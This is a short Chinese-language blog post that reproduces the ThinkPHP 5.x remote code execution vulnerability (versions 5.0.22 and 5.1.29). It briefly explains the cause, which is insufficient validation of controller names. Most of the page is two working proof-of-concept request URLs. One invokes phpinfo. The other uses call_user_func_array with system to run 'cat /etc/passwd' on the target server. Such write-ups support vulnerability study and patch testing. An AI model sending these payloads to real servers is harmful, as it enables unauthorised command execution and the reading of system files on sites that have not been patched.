Thinkphp5 5.0.22 / 5.1.29远程执行代码漏洞复现

2019-11-20 12:00:07 浏览数 (1)

漏洞知识库

网络安全/渗透测试/代码审计/

关注

ThinkPhp5.x远程代码执行漏洞复现

漏洞简介

2018年12月10日中午,thinkphp官方公众号发布了一个更新通知,包含了一个5.x系列所有版本存在被getshell的高风险漏洞。

漏洞原理

结合官方公告说的由于对控制器名没有足够的检测,再查看官方git commit信息

复现过程

通过phpinfo函数写出phpinfo()的信息

POC:

代码语言:javascript复制
通过phpinfo函数写出phpinfo()的信息
index.php?s=/Index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

利用system函数远程命令执行

POC:

代码语言:javascript复制
利用system函数远程命令执行读取/etc/passwd
index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /etc/passwd

0 人点赞